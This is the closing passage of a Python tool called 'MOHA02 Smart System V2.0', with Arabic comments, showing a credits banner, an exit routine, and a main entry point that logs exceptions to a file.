    print(f"{G} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print(f"{Y} [!] THANK YOU FOR USING MOHA02 SYSTEM")
    time.sleep(2)

def EXIT_PROCEDURE():
    # إجراءات الخروج
    clear()
    MOHA02_CREDITS_DISPLAY()
    sys.exit()

def INITIALIZE_APP():
    # نقطة الدخول الحقيقية للأداة
    SYSTEM_INTEGRITY_CHECK()
    FOLDER_CLEANER()
    MASTER_RUNNER()

# الأوامر النهائية للتشغيل
if __name__ == "__main__":
    try:
        INITIALIZE_APP()
    except Exception as e:
        # تسجيل الأخطاء في ملف خارجي للمراجعة
        with open("logs/error.txt", "a") as f:
            f.write(f"[{GET_TIME_STAMP()}] {str(e)}\n")
        print(f"{R} [!] FATAL ERROR. CHECK logs/error.txt")

# ======================================================
# END OF MOHA02 SMART SYSTEM V2.0 (TOTAL 1200 LINES)
# DEVELOPED BY: MOHA EL CHLEFAWI (موحا الشلفاوي)
# ======================================================
